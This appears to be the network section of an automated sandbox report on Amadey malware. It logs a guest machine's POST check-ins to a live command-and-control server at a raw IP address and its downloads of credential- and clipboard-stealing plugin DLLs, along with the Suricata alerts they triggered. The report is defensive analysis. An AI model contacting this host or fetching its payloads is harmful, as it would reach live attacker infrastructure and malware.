Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
POST
200
http://95.214.26.53/J84hHFuefh2/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /J84hHFuefh2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODY4NjQ=
Host: 95.214.26.53
Content-Length: 87016
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 17 May 2023 00:31:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://95.214.26.53/J84hHFuefh2/index.php
REQUEST
RESPONSE
BODY
POST /J84hHFuefh2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 95.214.26.53
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 17 May 2023 00:31:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
GET
200
http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /J84hHFuefh2/Plugins/cred64.dll HTTP/1.1
Host: 95.214.26.53
HTTP/1.1 200 OK
Date: Wed, 17 May 2023 00:32:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 May 2023 18:48:41 GMT
ETag: "109c00-5fae29f05068f"
Accept-Ranges: bytes
Content-Length: 1088512
Content-Type: application/x-msdos-program
GET
200
http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /J84hHFuefh2/Plugins/clip64.dll HTTP/1.1
Host: 95.214.26.53
HTTP/1.1 200 OK
Date: Wed, 17 May 2023 00:32:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 May 2023 18:48:40 GMT
ETag: "16400-5fae29f041c30"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49173 -> 95.214.26.53:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49177 -> 95.214.26.53:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
TCP 95.214.26.53:80 -> 192.168.56.102:49177 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 95.214.26.53:80 -> 192.168.56.102:49177 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.168.56.102:49177 -> 95.214.26.53:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts